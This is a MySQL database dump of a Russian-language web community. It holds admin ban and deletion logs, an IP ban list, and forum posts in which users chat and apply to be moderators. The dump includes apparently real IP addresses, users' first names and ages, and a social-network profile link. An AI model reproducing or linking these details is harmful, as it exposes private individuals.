DROP TABLE IF EXISTS `adm_logs`;
CREATE TABLE `adm_logs` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` char(15) NOT NULL,
`who` int(11) NOT NULL DEFAULT '0',
`type` char(10) NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=229 DEFAULT CHARSET=utf8;
INSERT INTO adm_logs VALUES("16","109","27","bann_nick","1369337388");
INSERT INTO adm_logs VALUES("15","109","27","bann_ip","1369337362");
INSERT INTO adm_logs VALUES("14","104","27","bann_ip","1369245848");
INSERT INTO adm_logs VALUES("13","104","4","bann_nick","1369237523");
INSERT INTO adm_logs VALUES("12","104","4","bann_ip","1369237494");
INSERT INTO adm_logs VALUES("17","109","27","bann_nick","1369337565");
INSERT INTO adm_logs VALUES("18","115","27","bann_nick","1369417908");
INSERT INTO adm_logs VALUES("19","ipoooo","27","delete","1369427828");
INSERT INTO adm_logs VALUES("20","212","27","bann_ip","1371456757");
INSERT INTO adm_logs VALUES("21","212","27","bann_nick","1371456787");
INSERT INTO adm_logs VALUES("22","217","27","bann_nick","1371583199");
INSERT INTO adm_logs VALUES("23","188","27","bann_nick","1371664490");
INSERT INTO adm_logs VALUES("24","26","27","bann_ip","1371664509");
INSERT INTO adm_logs VALUES("25","188","27","bann_ip","1371664522");
INSERT INTO adm_logs VALUES("26","13","27","bann_ip","1371664615");
INSERT INTO adm_logs VALUES("27","213","27","bann_nick","1371669128");
INSERT INTO adm_logs VALUES("28","213","27","bann_ip","1371669152");
INSERT INTO adm_logs VALUES("29","217","27","bann_ip","1371734593");
INSERT INTO adm_logs VALUES("30","234","73","bann_nick","1371970081");
INSERT INTO adm_logs VALUES("31","99","13","bann_nick","1372013292");
INSERT INTO adm_logs VALUES("32","255","13","bann_nick","1372248443");
INSERT INTO adm_logs VALUES("33","256","27","bann_nick","1372248876");
INSERT INTO adm_logs VALUES("34","256","27","bann_ip","1372248903");
INSERT INTO adm_logs VALUES("35","260","27","bann_nick","1372249377");
INSERT INTO adm_logs VALUES("36","259","27","bann_nick","1372253435");
INSERT INTO adm_logs VALUES("37","17","27","bann_nick","1372270204");
INSERT INTO adm_logs VALUES("38","Философ","13","delete","1372403043");
INSERT INTO adm_logs VALUES("39","283","4","bann_nick","1372427285");
INSERT INTO adm_logs VALUES("40","280","27","bann_nick","1372443370");
INSERT INTO adm_logs VALUES("41","292","27","bann_nick","1372529528");
INSERT INTO adm_logs VALUES("42","137","27","bann_nick","1372672864");
INSERT INTO adm_logs VALUES("43","280","17","bann_nick","1372682094");
INSERT INTO adm_logs VALUES("44","bejsser","1","delete","1372771300");
INSERT INTO adm_logs VALUES("45","Master","1","delete","1372771314");
INSERT INTO adm_logs VALUES("46","314","3","bann_ip","1372862424");
INSERT INTO adm_logs VALUES("47","314","3","bann_nick","1372862451");
INSERT INTO adm_logs VALUES("48","ByXrom","3","delete","1372862907");
INSERT INTO adm_logs VALUES("49","17","3","bann_nick","1372958270");
INSERT INTO adm_logs VALUES("50","17","3","bann_nick","1373053653");
INSERT INTO adm_logs VALUES("51","17","3","bann_nick","1373053682");
INSERT INTO adm_logs VALUES("52","17","3","bann_nick","1373056285");
INSERT INTO adm_logs VALUES("53","21","3","bann_nick","1373136765");
INSERT INTO adm_logs VALUES("54","168","3","bann_nick","1373136849");
INSERT INTO adm_logs VALUES("55","168","3","bann_ip","1373136872");
INSERT INTO adm_logs VALUES("56","21","3","bann_ip","1373136886");
INSERT INTO adm_logs VALUES("57","99","3","bann_nick","1373146683");
INSERT INTO adm_logs VALUES("58","17","3","bann_nick","1373200808");
INSERT INTO adm_logs VALUES("59","17","3","bann_ip","1373200828");
INSERT INTO adm_logs VALUES("60","271","3","bann_nick","1373304302");
INSERT INTO adm_logs VALUES("61","343","3","bann_nick","1373396060");
INSERT INTO adm_logs VALUES("62","Bot","114","delete","1373554986");
INSERT INTO adm_logs VALUES("63","360","2","bann_nick","1373617928");
INSERT INTO adm_logs VALUES("64","256","3","bann_nick","1373618607");
INSERT INTO adm_logs VALUES("65","332","3","bann_nick","1373663256");
INSERT INTO adm_logs VALUES("66","347","3","bann_nick","1373705157");
INSERT INTO adm_logs VALUES("67","99","3","bann_nick","1373719513");
INSERT INTO adm_logs VALUES("68","372","3","bann_nick","1373736446");
INSERT INTO adm_logs VALUES("69","353","3","bann_nick","1373741653");
INSERT INTO adm_logs VALUES("70","363","3","bann_nick","1373812509");
INSERT INTO adm_logs VALUES("71","373","2","bann_nick","1373855519");
INSERT INTO adm_logs VALUES("72","373","2","bann_nick","1373855552");
INSERT INTO adm_logs VALUES("73","379","3","bann_nick","1373982640");
INSERT INTO adm_logs VALUES("74","361","3","bann_nick","1374327055");
INSERT INTO adm_logs VALUES("75","388","3","bann_nick","1374440851");
INSERT INTO adm_logs VALUES("76","388","3","bann_ip","1374441236");
INSERT INTO adm_logs VALUES("77","322","3","bann_nick","1374441433");
INSERT INTO adm_logs VALUES("78","391","3","bann_nick","1374561050");
INSERT INTO adm_logs VALUES("79","353","3","bann_nick","1374579329");
INSERT INTO adm_logs VALUES("80","353","3","bann_nick","1374761359");
INSERT INTO adm_logs VALUES("81","353","3","bann_nick","1374763003");
INSERT INTO adm_logs VALUES("82","Mukpomup","3","delete","1375190815");
INSERT INTO adm_logs VALUES("83","socboys","3","delete","1375604420");
INSERT INTO adm_logs VALUES("84","353","2","bann_nick","1375630259");
INSERT INTO adm_logs VALUES("85","353","2","bann_nick","1375630928");
INSERT INTO adm_logs VALUES("86","459","114","bann_nick","1375705279");
INSERT INTO adm_logs VALUES("87","460","114","bann_nick","1375706898");
INSERT INTO adm_logs VALUES("88","99","3","bann_nick","1375789779");
INSERT INTO adm_logs VALUES("89","99","3","bann_nick","1375807546");
INSERT INTO adm_logs VALUES("90","80","4","bann_nick","1376236868");
INSERT INTO adm_logs VALUES("91","80","4","bann_ip","1376236881");
INSERT INTO adm_logs VALUES("92","80","3","bann_ip","1376237438");
INSERT INTO adm_logs VALUES("93","493","3","bann_nick","1376246417");
INSERT INTO adm_logs VALUES("94","493","3","bann_ip","1376246425");
INSERT INTO adm_logs VALUES("95","494","3","bann_ip","1376246748");
INSERT INTO adm_logs VALUES("96","494","3","bann_nick","1376246785");
INSERT INTO adm_logs VALUES("97","494","3","bann_ip","1376246921");
INSERT INTO adm_logs VALUES("98","494","3","bann_ip","1376247116");
INSERT INTO adm_logs VALUES("99","497","4","bann_nick","1376297295");
INSERT INTO adm_logs VALUES("100","451","4","bann_nick","1376307674");
INSERT INTO adm_logs VALUES("101","451","4","bann_ip","1376307688");
INSERT INTO adm_logs VALUES("102","503","3","bann_nick","1376323464");
INSERT INTO adm_logs VALUES("103","422","3","bann_nick","1376324922");
INSERT INTO adm_logs VALUES("104","506","3","bann_ip","1376339034");
INSERT INTO adm_logs VALUES("105","506","3","bann_nick","1376339443");
INSERT INTO adm_logs VALUES("106","188","3","bann_nick","1376340293");
INSERT INTO adm_logs VALUES("107","188","3","bann_ip","1376340379");
INSERT INTO adm_logs VALUES("108","506","3","bann_ip","1376341811");
INSERT INTO adm_logs VALUES("109","353","2","bann_nick","1376361550");
INSERT INTO adm_logs VALUES("110","498","3","bann_nick","1376385875");
INSERT INTO adm_logs VALUES("111","498","3","bann_ip","1376385882");
INSERT INTO adm_logs VALUES("112","517","1","bann_ip","1376389083");
INSERT INTO adm_logs VALUES("113","229","2","bann_nick","1376394254");
INSERT INTO adm_logs VALUES("114","229","2","bann_nick","1376394259");
INSERT INTO adm_logs VALUES("115","510","2","bann_nick","1376394302");
INSERT INTO adm_logs VALUES("116","42","2","bann_nick","1376394366");
INSERT INTO adm_logs VALUES("117","509","2","bann_nick","1376394406");
INSERT INTO adm_logs VALUES("118","500","2","bann_nick","1376395800");
INSERT INTO adm_logs VALUES("119","43","2","bann_nick","1376397433");
INSERT INTO adm_logs VALUES("120","64","2","bann_nick","1376397490");
INSERT INTO adm_logs VALUES("121","151","3","bann_ip","1376409876");
INSERT INTO adm_logs VALUES("122","151","3","bann_nick","1376409906");
INSERT INTO adm_logs VALUES("123","80","3","bann_nick","1376412459");
INSERT INTO adm_logs VALUES("124","80","3","bann_ip","1376412468");
INSERT INTO adm_logs VALUES("125","535","2","bann_nick","1376457142");
INSERT INTO adm_logs VALUES("126","Taraska","2","delete","1376457494");
INSERT INTO adm_logs VALUES("127","524","2","bann_nick","1376468498");
INSERT INTO adm_logs VALUES("128","422","3","bann_nick","1376472608");
INSERT INTO adm_logs VALUES("129","545","3","bann_nick","1376483187");
INSERT INTO adm_logs VALUES("130","544","3","bann_nick","1376483507");
INSERT INTO adm_logs VALUES("131","546","3","bann_nick","1376486252");
INSERT INTO adm_logs VALUES("132","aspx","4","delete","1376493510");
INSERT INTO adm_logs VALUES("133","537","3","bann_nick","1376518057");
INSERT INTO adm_logs VALUES("134","551","4","bann_nick","1376555876");
INSERT INTO adm_logs VALUES("135","551","4","bann_ip","1376555888");
INSERT INTO adm_logs VALUES("136","465","1","bann_nick","1376577224");
INSERT INTO adm_logs VALUES("137","328","2","bann_nick","1376723948");
INSERT INTO adm_logs VALUES("138","80","3","bann_nick","1376726880");
INSERT INTO adm_logs VALUES("139","80","2","bann_nick","1376752666");
INSERT INTO adm_logs VALUES("140","571","3","bann_nick","1376768197");
INSERT INTO adm_logs VALUES("141","478","2","bann_nick","1376811424");
INSERT INTO adm_logs VALUES("142","262","2","bann_nick","1376811457");
INSERT INTO adm_logs VALUES("143","573","2","bann_nick","1376811495");
INSERT INTO adm_logs VALUES("144","574","3","bann_nick","1376812541");
INSERT INTO adm_logs VALUES("145","529","3","bann_nick","1376829854");
INSERT INTO adm_logs VALUES("146","395","3","bann_ip","1376832044");
INSERT INTO adm_logs VALUES("147","590","2","bann_nick","1377005293");
INSERT INTO adm_logs VALUES("148","605","3","bann_nick","1377025406");
INSERT INTO adm_logs VALUES("149","aaaaas","4","delete","1377095094");
INSERT INTO adm_logs VALUES("150","3","2","bann_nick","1377263263");
INSERT INTO adm_logs VALUES("151","AxeL","1","delete","1377368252");
INSERT INTO adm_logs VALUES("152","638","1","bann_nick","1377528227");
INSERT INTO adm_logs VALUES("153","811","3","bann_nick","1377679204");
INSERT INTO adm_logs VALUES("154","195","1","bann_nick","1377686938");
INSERT INTO adm_logs VALUES("155","537","1","bann_nick","1377687002");
INSERT INTO adm_logs VALUES("156","200","3","bann_nick","1377719756");
INSERT INTO adm_logs VALUES("157","44","3","bann_nick","1377791427");
INSERT INTO adm_logs VALUES("158","44","3","bann_nick","1377791484");
INSERT INTO adm_logs VALUES("159","874","3","bann_nick","1377808335");
INSERT INTO adm_logs VALUES("160","537","1","bann_nick","1377846084");
INSERT INTO adm_logs VALUES("161","Serkan","114","delete","1377891269");
INSERT INTO adm_logs VALUES("162","889","4","bann_nick","1377956068");
INSERT INTO adm_logs VALUES("163","791","1","bann_nick","1377972571");
INSERT INTO adm_logs VALUES("164","888","1","bann_nick","1377973239");
INSERT INTO adm_logs VALUES("165","VITAMIN","1","delete","1377974764");
INSERT INTO adm_logs VALUES("166","891","1","bann_nick","1378138033");
INSERT INTO adm_logs VALUES("167","918","2","bann_nick","1378257512");
INSERT INTO adm_logs VALUES("168","432","901","bann_nick","1378465219");
INSERT INTO adm_logs VALUES("169","NeTMaSTeR","114","delete","1379841911");
INSERT INTO adm_logs VALUES("170","VITAMIN","901","delete","1379935870");
INSERT INTO adm_logs VALUES("171","1007","573","bann_nick","1380400652");
INSERT INTO adm_logs VALUES("172","650","3","bann_nick","1381176395");
INSERT INTO adm_logs VALUES("173","1064","573","bann_nick","1382541832");
INSERT INTO adm_logs VALUES("174","1112","573","bann_nick","1382631320");
INSERT INTO adm_logs VALUES("175","1108","3","bann_nick","1382641793");
INSERT INTO adm_logs VALUES("176","569","3","bann_nick","1382945610");
INSERT INTO adm_logs VALUES("177","569","3","bann_ip","1382946044");
INSERT INTO adm_logs VALUES("178","530","3","bann_nick","1383149524");
INSERT INTO adm_logs VALUES("179","530","2","bann_nick","1383150497");
INSERT INTO adm_logs VALUES("180","1146","3","bann_nick","1383211199");
INSERT INTO adm_logs VALUES("181","1231","573","bann_nick","1384899889");
INSERT INTO adm_logs VALUES("182","1223","1099","bann_nick","1384926748");
INSERT INTO adm_logs VALUES("183","1099","3","bann_nick","1384966794");
INSERT INTO adm_logs VALUES("184","986","573","bann_nick","1385053962");
INSERT INTO adm_logs VALUES("185","970","3","bann_nick","1385134446");
INSERT INTO adm_logs VALUES("186","1250","573","bann_nick","1385139294");
INSERT INTO adm_logs VALUES("187","Некст","3","delete","1385200959");
INSERT INTO adm_logs VALUES("188","Dizel","3","delete","1385204208");
INSERT INTO adm_logs VALUES("189","dedok","3","delete","1385228670");
INSERT INTO adm_logs VALUES("190","1288","3","bann_nick","1385485285");
INSERT INTO adm_logs VALUES("191","1276","325","bann_nick","1385539956");
INSERT INTO adm_logs VALUES("192","1070","573","bann_nick","1385575467");
INSERT INTO adm_logs VALUES("193","419","573","bann_nick","1385575511");
INSERT INTO adm_logs VALUES("194","288","573","bann_nick","1385575553");
INSERT INTO adm_logs VALUES("195","1331","573","bann_nick","1385575602");
INSERT INTO adm_logs VALUES("196","918","2","bann_nick","1385819570");
INSERT INTO adm_logs VALUES("197","1355","573","bann_nick","1385887301");
INSERT INTO adm_logs VALUES("198","1357","573","bann_nick","1385899277");
INSERT INTO adm_logs VALUES("199","1386","573","bann_nick","1386267184");
INSERT INTO adm_logs VALUES("200","1389","573","bann_nick","1386354251");
INSERT INTO adm_logs VALUES("201","xakepok_ua","573","delete","1386520698");
INSERT INTO adm_logs VALUES("202","32223","489","bann_nick","1386614941");
INSERT INTO adm_logs VALUES("203","Артем","573","delete","1386708632");
INSERT INTO adm_logs VALUES("204","1201","1360","bann_ip","1386779151");
INSERT INTO adm_logs VALUES("205","32223","325","bann_ip","1386788484");
INSERT INTO adm_logs VALUES("206","325","1360","bann_nick","1386819995");
INSERT INTO adm_logs VALUES("207","325","1360","bann_nick","1386820015");
INSERT INTO adm_logs VALUES("208","325","1360","bann_nick","1386820111");
INSERT INTO adm_logs VALUES("209","1201","1271","bann_nick","1387440740");
INSERT INTO adm_logs VALUES("210","1201","1271","bann_ip","1387463112");
INSERT INTO adm_logs VALUES("211","955","489","bann_nick","1388575693");
INSERT INTO adm_logs VALUES("212","32331","573","bann_nick","1388776416");
INSERT INTO adm_logs VALUES("213","32333","573","bann_nick","1388913301");
INSERT INTO adm_logs VALUES("214","32343","573","bann_nick","1389022985");
INSERT INTO adm_logs VALUES("215","32368","573","bann_nick","1389994207");
INSERT INTO adm_logs VALUES("216","1121","573","bann_nick","1390149671");
INSERT INTO adm_logs VALUES("217","32377","573","bann_nick","1390314899");
INSERT INTO adm_logs VALUES("218","32400","1","bann_nick","1390744921");
INSERT INTO adm_logs VALUES("219","32400","1","bann_nick","1390749320");
INSERT INTO adm_logs VALUES("220","32400","573","bann_nick","1390749438");
INSERT INTO adm_logs VALUES("221","32400","325","bann_nick","1390935127");
INSERT INTO adm_logs VALUES("222","8","1","bann_nick","1420466096");
INSERT INTO adm_logs VALUES("223","8","1","bann_ip","1420466106");
INSERT INTO adm_logs VALUES("224","Хацкер","1","delete","1425230273");
INSERT INTO adm_logs VALUES("225","xkat","1","delete","1426396080");
INSERT INTO adm_logs VALUES("226","18","27","bann_nick","1426446260");
INSERT INTO adm_logs VALUES("227","49","27","bann_nick","1426601343");
INSERT INTO adm_logs VALUES("228","131","94","bann_nick","1438099715");
DROP TABLE IF EXISTS `albums`;
CREATE TABLE `albums` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`parol` int(11) NOT NULL DEFAULT '0',
`friend_looks` smallint(2) NOT NULL DEFAULT '0',
`path` char(100) NOT NULL,
`name` char(50) NOT NULL,
`type` char(1) NOT NULL,
`cat` int(11) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL DEFAULT '0',
`rotate` int(11) NOT NULL DEFAULT '0',
`friend_comm` smallint(2) NOT NULL DEFAULT '0',
`last` int(11) NOT NULL DEFAULT '0',
`cover` smallint(1) NOT NULL DEFAULT '0',
`block` smallint(1) NOT NULL DEFAULT '0',
`who_block` int(11) NOT NULL DEFAULT '0',
`why_block` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `bannlist`;
CREATE TABLE `bannlist` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`ip` char(100) NOT NULL DEFAULT '0',
`who` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=9946506 DEFAULT CHARSET=utf8;
INSERT INTO bannlist VALUES("6804209","46.211.182.159","104");
INSERT INTO bannlist VALUES("8887939","130.185.105.78","109");
INSERT INTO bannlist VALUES("9705394","82.145.208.241","217");
INSERT INTO bannlist VALUES("3680110","217.212.231.26","256");
INSERT INTO bannlist VALUES("6712770","188.237.50.103","388");
INSERT INTO bannlist VALUES("9250488","5.105.57.45","493");
INSERT INTO bannlist VALUES("8580933","82.145.209.49","494");
INSERT INTO bannlist VALUES("1998956","82.145.209.49","494");
INSERT INTO bannlist VALUES("5635575","82.145.209.49","494");
INSERT INTO bannlist VALUES("3721555","123.138.30.139","451");
INSERT INTO bannlist VALUES("2085677","82.145.209.115","506");
INSERT INTO bannlist VALUES("1181819","82.145.216.31","188");
INSERT INTO bannlist VALUES("6115103","82.145.208.134","498");
INSERT INTO bannlist VALUES("2329884","80.239.242.186","151");
INSERT INTO bannlist VALUES("3066164","82.145.209.84","569");
INSERT INTO bannlist VALUES("2673640","82.145.221.106","1201");
DROP TABLE IF EXISTS `cat_smiles`;
CREATE TABLE `cat_smiles` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8;
INSERT INTO cat_smiles VALUES("12","Лица");
INSERT INTO cat_smiles VALUES("13","Улыбки :)");
INSERT INTO cat_smiles VALUES("14","Надписи");
INSERT INTO cat_smiles VALUES("16","Разное");
DROP TABLE IF EXISTS `dialog`;
CREATE TABLE `dialog` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`message` text NOT NULL,
`type` char(10) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=70 DEFAULT CHARSET=utf8;
INSERT INTO dialog VALUES("69","соси","mat");
DROP TABLE IF EXISTS `f_message`;
CREATE TABLE `f_message` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`tid` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`user` int(11) NOT NULL DEFAULT '0',
`whoedit` int(11) NOT NULL DEFAULT '0',
`path` char(255) NOT NULL DEFAULT '0',
`date` char(20) NOT NULL,
`podforum` int(11) NOT NULL DEFAULT '0',
`time` int(11) NOT NULL DEFAULT '0',
`best` tinyint(1) NOT NULL DEFAULT '0',
`worse` tinyint(1) NOT NULL DEFAULT '0',
`good` int(11) DEFAULT '0',
`bad` int(11) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=267 DEFAULT CHARSET=utf8;
INSERT INTO f_message VALUES("1","1","<span style=\"color:green;\">Теме присвоил статус</span> <span style=\"color:green;\"><b>TOP</b>!</span>","1","0","0","","97","1420216717","0","0","0","0");
INSERT INTO f_message VALUES("2","1","<span style=\"color: #FF0000;\"><b>[censored]</b></span>ь","1","0","0","","97","1420226853","0","0","0","0");
INSERT INTO f_message VALUES("3","3","*упорот*","6","0","0","","103","1420282975","0","0","0","0");
INSERT INTO f_message VALUES("4","1","мне 8 нравится но пишут что глючит сильно и много сис требований","6","0","0","","97","1420283232","0","0","0","0");
INSERT INTO f_message VALUES("5","1","<div class=\"quote\">Veteran: мне 8 нравится но пишут что глючит сильно и много сис требований</div>мне тоже нравится :-)","1","0","0","","97","1420284696","0","0","0","0");
INSERT INTO f_message VALUES("6","1","<div class=\"quote\">Senusert: мне тоже нравится :-)</div>но мой пк ее не тянет)))))))","6","0","0","","97","1420285371","0","0","0","0");
INSERT INTO f_message VALUES("7","1","<div class=\"quote\">Veteran: но мой пк ее не тянет)))))))</div>Жизньболь :) Когда у компа мощности ноль :D","1","0","0","","97","1420292393","0","0","0","0");
INSERT INTO f_message VALUES("8","1","<div class=\"quote\">Senusert: Жизньболь :) Когда у компа мощности ноль :D</div>Точняк )ffff","6","0","0","","97","1420292545","0","0","0","0");
INSERT INTO f_message VALUES("9","1","<div class=\"quote\">Veteran: Точняк )ffff</div>ну так :)","1","0","0","","97","1420292727","0","0","0","0");
INSERT INTO f_message VALUES("10","1","<div class=\"quote\">Veteran: Точняк )ffff</div>а ты её устанавливал?","1","0","0","","97","1420303965","0","0","0","0");
INSERT INTO f_message VALUES("11","1","<div class=\"quote\">Senusert: а ты её устанавливал?</div>да ты че!я и не рыпался((((","6","0","0","","97","1420303997","0","0","0","0");
INSERT INTO f_message VALUES("12","1","<div class=\"quote\">Veteran: да ты че!я и не рыпался((((</div>а по системным решил, что комп не потянет?","1","0","0","","97","1420304044","0","0","0","0");
INSERT INTO f_message VALUES("13","1","<div class=\"quote\">Senusert: а по системным решил, что комп не потянет?</div>Ну с натягом может и потянет,но для работы она не пойдет!","6","0","0","","97","1420350835","0","0","0","0");
INSERT INTO f_message VALUES("14","1","<div class=\"quote\">Veteran: Ну с натягом может и потянет,но для работы она не пойдет!</div>а какая у тебя вообще винда?","1","0","0","","97","1420351066","0","0","0","0");
INSERT INTO f_message VALUES("15","1","<div class=\"quote\">Senusert: а какая у тебя вообще винда?</div>Зверь","6","0","0","","97","1420365079","0","0","0","0");
INSERT INTO f_message VALUES("16","1","<div class=\"quote\">Veteran: Зверь</div>тоже норм :)","1","0","0","","97","1420371030","0","0","0","0");
INSERT INTO f_message VALUES("17","1","<div class=\"quote\">Senusert: тоже норм :)</div>Видюху за пару лет сжирает!","6","0","0","","97","1420374468","0","0","0","0");
INSERT INTO f_message VALUES("18","2","…адмимя денисвозраст 16город <span style=\"color: #FF0000;\"><b>[censored]</b></span>сонстаж болеё 3 х…","19","0","0","","102","1426426458","0","0","0","0");
INSERT INTO f_message VALUES("19","2","1. Айден.2. 18 лет.3. Адекватный, грамотный и общительный парень, изучил правила сайта, имею опыт более 4 лет, был модератором/администрaтором популярных вап игр.4. Онлай от 10ч в сутки.5. Связь:Hackbite - IronnHeartVk - http://vk.com/ironnheartBymas - http://bymas.ru/id12180","21","0","0","","102","1426426726","0","0","0","0");
INSERT INTO f_message VALUES("20","2","Боже, как же все кривоПереход на другую строку пропускает","21","0","0","","102","1426426929","0","0","0","0");
INSERT INTO f_message VALUES("21","2","<div class=\"quote\">IronnHeart: Боже, как же все кривоПереход на другую строку пропускает</div>+++","19","0","0","","102","1426427452","0","0","0","0");
INSERT INTO f_message VALUES("22","3","Сделайте более приятным отображений сообщений на форуме, криво все.","21","0","0","","103","1426429015","0","0","0","0");
INSERT INTO f_message VALUES("23","2","александр! пойду модером! опыт имею хороший! 21 год! онлайн от 2х до 6ти часов в день! бесплатная помащь спама сайта! адекватен и спакоен! помащь неопытным за спасибо!","27","27","0","","102","1426432037","0","0","0","0");
INSERT INTO f_message VALUES("24","2","[b] IronnHeart[/b], принят на роль модератора сайта","1","0","0","","102","1426432296","0","0","0","0");
INSERT INTO f_message VALUES("25","3","[b] IronnHeart[/b], хорошо, в ближайшие дни разберёмся :)","1","0","0","","103","1426432438","0","0","0","0");
INSERT INTO f_message VALUES("26","2","Александр 16 лет. В сети 8-10 часов в сутки. Люблю читать хабр и тостер, знания php mysqlI pdo html css :D","23","0","0","","102","1426432694","0","0","0","0");
INSERT INTO f_message VALUES("27","2","Нур 23 года. пых, хтмл, сиесес))","30","0","0","","102","1426433630","0","0","0","0");
INSERT INTO f_message VALUES("28","3","В первую очередь новый диз.","30","0","0","","103","1426433687","0","0","0","0");
INSERT INTO f_message VALUES("29","3","[b] ICE[/b], разумеется :) Закажем конечно :)","1","0","0","","103","1426433726","0","0","0","0");
INSERT INTO f_message VALUES("30","1","Думаю 7 стабильнее ...","30","0","0","","97","1426433793","0","0","0","0");
INSERT INTO f_message VALUES("31","1","[b] ICE[/b], ну может быть, но вот я недавно 8.1 установил, вроде норм :)","1","0","0","","97","1426433909","0","0","0","0");
INSERT INTO f_message VALUES("32","3","<div class=\"quote\">Senusert: [b] ICE[/b], разумеется :) Закажем конечно :)</div>И будет славно отдельно описать тематику сайта по подробнее","30","0","0","","103","1426433983","0","0","0","0");
INSERT INTO f_message VALUES("33","3","[b] ICE[/b], в лс можгу описать :)","1","0","0","","103","1426434031","0","0","0","0");
INSERT INTO f_message VALUES("34","3","[b] Senusert[/b], давай. и для публики не мешало бы)","30","0","0","","103","1426434105","0","0","0","0");
INSERT INTO f_message VALUES("35","2","Привет. Модераторы нужны еще? К вам пришел с профика, если что, анкету там смотрите, ник такой-же.","32","0","0","","102","1426434240","0","0","0","0");
INSERT INTO f_message VALUES("36","3","[b] ICE[/b], ок, сделаем :)","1","0","0","","103","1426434251","0","0","0","0");
INSERT INTO f_message VALUES("37","2","[b] fenomen[/b], заполни анкету :)","1","0","0","","102","1426434321","0","0","0","0");
INSERT INTO f_message VALUES("38","2","[b] Senusert[/b], Хорошо, но более подробно смотри на профике, арбитраж, и тому подобное..","32","0","0","","102","1426434416","0","0","0","0");
INSERT INTO f_message VALUES("39","2","Антон 16 лет. Системный Администратор Linux, Windows","36","0","0","","102","1426434453","0","0","0","0");
INSERT INTO f_message VALUES("40","2","[b] fenomen[/b], а, ну это разумеется :)","1","0","0","","102","1426434454","0","0","0","0");
INSERT INTO f_message VALUES("41","5","всем привет я саня21 год!","27","0","0","","97","1426434537","0","0","0","0");
INSERT INTO f_message VALUES("42","5","[b] vinkh[/b], Привет сан , Я Нур)","30","0","0","","97","1426434990","0","0","0","0");
INSERT INTO f_message VALUES("43","2","Могу пойти. Знания есть, адекватен. Могу копейку в развитие кинуть, если проект на пару недель, то можете не делать!","35","0","0","","102","1426435057","0","0","0","0");
INSERT INTO f_message VALUES("44","5","[b] ICE[/b], очень приятно!","27","0","0","","97","1426435064","0","0","0","0");
INSERT INTO f_message VALUES("45","2","[b] Senusert[/b], почему Страна/город не сохраняются?","32","0","0","","102","1426435094","0","0","0","0");
INSERT INTO f_message VALUES("46","2","[b] fenomen[/b], секунду, исправлю","1","0","0","","102","1426435187","0","0","0","0");
INSERT INTO f_message VALUES("47","5","<div class=\"quote\">vinkh: [b] ICE[/b], очень приятно!</div>Мне тоже)","30","0","0","","97","1426435327","0","0","0","0");
INSERT INTO f_message VALUES("48","2","[b] Senusert[/b], так-то все заполнил, кроме города...От себя немного: мне 20, сайтами начал заниматься лет 5 назад, опыт администрирования есть, своих проектов сейчас нет из-за нехватки времени, после работы готов сидеть здесь, следить за порядком.","32","0","0","","102","1426435699","0","0","0","0");
INSERT INTO f_message VALUES("49","5","Привет всем, Стас, 20 лет.","32","0","0","","97","1426435901","0","0","0","0");
INSERT INTO f_message VALUES("60","3","Дизайн кривой.","39","0","0","","103","1426436326","0","0","0","0");
INSERT INTO f_message VALUES("51","5","Хай всем, Андрей.","39","0","0","","97","1426436015","0","0","0","0");
INSERT INTO f_message VALUES("52","5","[b] Elitawap[/b], привет :)","1","0","0","","97","1426436057","0","0","0","0");
INSERT INTO f_message VALUES("53","2","[b] Senusert[/b], мод нужен?","39","0","0","","102","1426436094","0","0","0","0");
INSERT INTO f_message VALUES("55","2","[b] Elitawap[/b], возможно... :)","1","0","0","","102","1426436142","0","0","0","0");
INSERT INTO f_message VALUES("56","5","[b] Senusert[/b], привет а как сменить ник?","39","0","0","","97","1426436177","0","0","0","0");
INSERT INTO f_message VALUES("92","1","<div class=\"quote\">Elitawap: [b] bypass[/b], Windows 0.0.0.1 gavnakod edition Гг</div>Когда первые обновки, а то я тут терминальные лицензии взломал. Гг зато заходить норм с пк могу. И смотреть сайты, которые законодательство запретила. Гг","36","0","0","","97","1426438015","0","0","0","0");
INSERT INTO f_message VALUES("90","1","[b] bypass[/b], Windows 0.0.0.1 gavnakod edition Гг","39","0","0","","97","1426437886","0","0","0","0");
INSERT INTO f_message VALUES("59","2","[b] Senusert[/b], пиши в лс.","39","0","0","","102","1426436263","0","0","0","0");
INSERT INTO f_message VALUES("62","1","7 рулит!","39","0","0","","97","1426436421","0","0","0","0");
INSERT INTO f_message VALUES("64","1","<div class=\"quote\">Elitawap: 7 рулит!</div>Которую скоро с поддержки снимут. Уже на win 2008 не поступают обновления","36","0","0","","97","1426436551","0","0","0","0");
INSERT INTO f_message VALUES("65","5","[b] Elitawap[/b], Перейдите во вкладку "Мой Аккаунт" нажав на свой ник вверху, далее перейдите в "Биллинг панель" нажав на кнопку "Войти" во вкладке Биллинг в профиле, далее нажмите "Изменить Ник". Стоимость смены ника составляет 10 монет","21","0","0","","97","1426436612","0","0","0","0");
INSERT INTO f_message VALUES("66","5","Всем привет, я Айден, буду рад новым знакомствам)<br />Мои ники на вм проектах : Bymas.ru - Yotun , Profiwm.com - Glowrider","21","21","0","","97","1426436676","0","0","0","0");
INSERT INTO f_message VALUES("68","5","[b] IronnHeart[/b], добро пожаловать!","27","0","0","","97","1426436751","0","0","0","0");
INSERT INTO f_message VALUES("69","5","[b] Elitawap[/b], говори на какой сменить? :)","1","0","0","","97","1426436777","0","0","0","0");
INSERT INTO f_message VALUES("70","7","<span style=\"color:green;\">Теме присвоил статус</span> <span style=\"color:green;\"><b>TOP</b>!</span>","30","0","0","","91","1426436875","0","0","0","0");
